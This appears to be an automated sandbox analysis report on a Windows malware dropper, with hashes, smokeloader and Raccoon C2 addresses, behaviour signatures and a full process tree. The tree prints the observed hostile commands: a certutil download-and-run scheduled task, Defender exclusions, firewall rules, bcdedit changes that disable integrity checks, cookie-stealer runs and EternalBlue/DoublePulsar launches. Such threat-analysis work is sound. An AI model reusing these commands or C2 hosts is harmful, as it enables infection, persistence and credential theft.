Resubmissions

18-03-2021 16:36

210318-gp18cmknhn 10

18-03-2021 16:36

210318-c2gfjesvja 10

18-03-2021 16:36

210318-vqkv89gzv2 10

18-03-2021 16:36

210318-hkbpmljzte 10

18-03-2021 16:36

210318-x2ph225zjs 10

18-03-2021 16:04

210318-a66favrxcs 10

Analysis

  • max time kernel
    1765s
  • max time network
    1802s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    18-03-2021 16:36

General

  • Target

    Setup3310.exe

  • Size

    381KB

  • MD5

    acf61459d6319724ab22cb5a8308d429

  • SHA1

    8a5d782e6f31c3005e5e0706a3d266ece492a6cf

  • SHA256

    344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e

  • SHA512

    d5f38cb8ed500510ba7d466345c854856ec70121683d4b5398651bfd41a7f5f8d754e8fece0bca38e334214d326afa1970b19e79c3d8507bff9d7782df762877

Malware Config

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Installs/modifies Browser Helper Object 2 TTPs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 22 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • GoLang User-Agent 18 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 27 IoCs
  • Script User-Agent 15 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup3310.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Users\Admin\AppData\Local\Temp\is-BPS56.tmp\Setup3310.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-BPS56.tmp\Setup3310.tmp" /SL5="$2015A,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1312
      • C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe
        "C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe" /Verysilent
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:564
        • C:\Users\Admin\AppData\Local\Temp\is-A18LD.tmp\Setup.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-A18LD.tmp\Setup.tmp" /SL5="$201A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe" /Verysilent
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:524
          • C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe
            "C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe" /Verysilent
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1448
            • C:\Users\Admin\AppData\Local\Temp\is-7OEG3.tmp\Delta.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-7OEG3.tmp\Delta.tmp" /SL5="$10202,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe" /Verysilent
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1692
              • C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe
                "C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe" /VERYSILENT
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:440
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
                  8⤵
                    PID:2124
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im Setup.exe /f
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2188
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      9⤵
                      • Delays execution with timeout.exe
                      PID:2380
            • C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe
              "C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe" /Verysilent
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:996
              • C:\Users\Admin\AppData\Local\Temp\is-O3DSJ.tmp\PictureLAb.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-O3DSJ.tmp\PictureLAb.tmp" /SL5="$20202,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe" /Verysilent
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:1136
                • C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe" /VERYSILENT
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:880
                  • C:\Users\Admin\AppData\Local\Temp\is-96118.tmp\Setup.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-96118.tmp\Setup.tmp" /SL5="$40164,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe" /VERYSILENT
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:620
                    • C:\Users\Admin\AppData\Local\Temp\is-4UT87.tmp\HGT.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-4UT87.tmp\HGT.exe" /S /UID=lab214
                      9⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      • Modifies system certificate store
                      PID:1248
                      • C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe
                        "C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe" /VERYSILENT
                        10⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1584
                        • C:\Users\Admin\AppData\Local\Temp\is-46A1L.tmp\prolab.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-46A1L.tmp\prolab.tmp" /SL5="$50160,575243,216576,C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe" /VERYSILENT
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:1612
                      • C:\Users\Admin\AppData\Local\Temp\4a-409e7-2cf-67cbb-1c49958b0c3e1\Paekygibina.exe
                        "C:\Users\Admin\AppData\Local\Temp\4a-409e7-2cf-67cbb-1c49958b0c3e1\Paekygibina.exe"
                        10⤵
                        • Executes dropped EXE
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:976
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exe & exit
                          11⤵
                            PID:3624
                            • C:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exe
                              C:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exe
                              12⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • Modifies system certificate store
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:3712
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                13⤵
                                • Executes dropped EXE
                                PID:3828
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                13⤵
                                • Executes dropped EXE
                                PID:4736
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                13⤵
                                • Executes dropped EXE
                                PID:6532
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                13⤵
                                  PID:2332
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exe & exit
                              11⤵
                                PID:6080
                                • C:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exe
                                  C:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exe
                                  12⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:6156
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exe & exit
                                11⤵
                                  PID:7828
                                  • C:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exe
                                    C:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exe
                                    12⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:8088
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      13⤵
                                        PID:4616
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          14⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4680
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exe & exit
                                    11⤵
                                      PID:5496
                                      • C:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exe
                                        C:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exe
                                        12⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:5532
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                          13⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:5636
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                            parse.exe -f json -b firefox
                                            14⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:8280
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                            parse.exe -f json -b chrome
                                            14⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:8336
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                            parse.exe -f json -b edge
                                            14⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:8348
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ea4qemi4.ach\GcleanerWW.exe /mixone & exit
                                      11⤵
                                        PID:6044
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe & exit
                                        11⤵
                                          PID:6348
                                          • C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe
                                            C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe
                                            12⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:6388
                                            • C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe
                                              C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe
                                              13⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:6904
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exe /8-2222 & exit
                                          11⤵
                                            PID:7316
                                            • C:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exe
                                              C:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exe /8-2222
                                              12⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:7360
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Frosty-Field"
                                                13⤵
                                                • Drops file in Program Files directory
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:7408
                                              • C:\Program Files (x86)\Frosty-Field\7za.exe
                                                "C:\Program Files (x86)\Frosty-Field\7za.exe" e -p154.61.71.51 winamp-plugins.7z
                                                13⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:8856
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Frosty-Field\setup.exe" -map "C:\Program Files (x86)\Frosty-Field\WinmonProcessMonitor.sys""
                                                13⤵
                                                  PID:6512
                                                  • C:\Program Files (x86)\Frosty-Field\setup.exe
                                                    "C:\Program Files (x86)\Frosty-Field\setup.exe" -map "C:\Program Files (x86)\Frosty-Field\WinmonProcessMonitor.sys"
                                                    14⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: LoadsDriver
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6560
                                                • C:\Program Files (x86)\Frosty-Field\7za.exe
                                                  "C:\Program Files (x86)\Frosty-Field\7za.exe" e -p154.61.71.51 winamp.7z
                                                  13⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:7816
                                                • C:\Program Files (x86)\Frosty-Field\setup.exe
                                                  "C:\Program Files (x86)\Frosty-Field\setup.exe" /8-2222
                                                  13⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:8200
                                                  • C:\Program Files (x86)\Frosty-Field\setup.exe
                                                    "C:\Program Files (x86)\Frosty-Field\setup.exe" /8-2222
                                                    14⤵
                                                    • Executes dropped EXE
                                                    • Windows security modification
                                                    • Adds Run key to start application
                                                    • Drops file in Windows directory
                                                    • Modifies data under HKEY_USERS
                                                    PID:3476
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                      15⤵
                                                        PID:3924
                                                        • C:\Windows\system32\netsh.exe
                                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                          16⤵
                                                          • Modifies data under HKEY_USERS
                                                          PID:2960
                                                      • C:\Windows\rss\csrss.exe
                                                        C:\Windows\rss\csrss.exe /8-2222
                                                        15⤵
                                                        • Drops file in Drivers directory
                                                        • Executes dropped EXE
                                                        • Drops file in Windows directory
                                                        • Modifies data under HKEY_USERS
                                                        • Modifies system certificate store
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3028
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          16⤵
                                                          • Creates scheduled task(s)
                                                          PID:4108
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                          16⤵
                                                          • Creates scheduled task(s)
                                                          PID:4128
                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                          16⤵
                                                          • Executes dropped EXE
                                                          • Modifies system certificate store
                                                          PID:4228
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6040
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6128
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6164
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6192
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6220
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6256
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6280
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6304
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6328
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6380
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6408
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -timeout 0
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6428
                                                          • C:\Windows\system32\bcdedit.exe
                                                            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                            17⤵
                                                            • Modifies boot configuration data using bcdedit
                                                            PID:6464
                                                        • C:\Windows\system32\bcdedit.exe
                                                          C:\Windows\Sysnative\bcdedit.exe /v
                                                          16⤵
                                                          • Modifies boot configuration data using bcdedit
                                                          PID:6580
                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                          16⤵
                                                          • Executes dropped EXE
                                                          PID:6636
                                                        • C:\Windows\windefender.exe
                                                          "C:\Windows\windefender.exe"
                                                          16⤵
                                                          • Executes dropped EXE
                                                          PID:7296
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                            17⤵
                                                              PID:7440
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                18⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:7388
                                                          • C:\Windows\SysWOW64\arp.exe
                                                            arp -a 10.7.0.84
                                                            16⤵
                                                              PID:8048
                                                            • C:\Windows\SysWOW64\arp.exe
                                                              arp -a 10.7.0.93
                                                              16⤵
                                                                PID:7960
                                                              • C:\Windows\SysWOW64\arp.exe
                                                                arp -a 10.7.0.88
                                                                16⤵
                                                                  PID:6044
                                                                • C:\Windows\SysWOW64\arp.exe
                                                                  arp -a 10.7.0.79
                                                                  16⤵
                                                                    PID:8736
                                                                  • C:\Windows\SysWOW64\arp.exe
                                                                    arp -a 10.7.0.85
                                                                    16⤵
                                                                      PID:8972
                                                                    • C:\Windows\SysWOW64\arp.exe
                                                                      arp -a 10.7.0.65
                                                                      16⤵
                                                                        PID:8984
                                                                      • C:\Windows\SysWOW64\arp.exe
                                                                        arp -a 10.7.0.72
                                                                        16⤵
                                                                          PID:9012
                                                                        • C:\Windows\SysWOW64\arp.exe
                                                                          arp -a 10.7.0.68
                                                                          16⤵
                                                                            PID:9064
                                                                          • C:\Windows\SysWOW64\arp.exe
                                                                            arp -a 10.7.0.91
                                                                            16⤵
                                                                              PID:2208
                                                                            • C:\Windows\SysWOW64\arp.exe
                                                                              arp -a 10.7.0.76
                                                                              16⤵
                                                                                PID:3744
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:9112
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:9152
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:3248
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:3256
                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe
                                                                                16⤵
                                                                                • Executes dropped EXE
                                                                                PID:3336
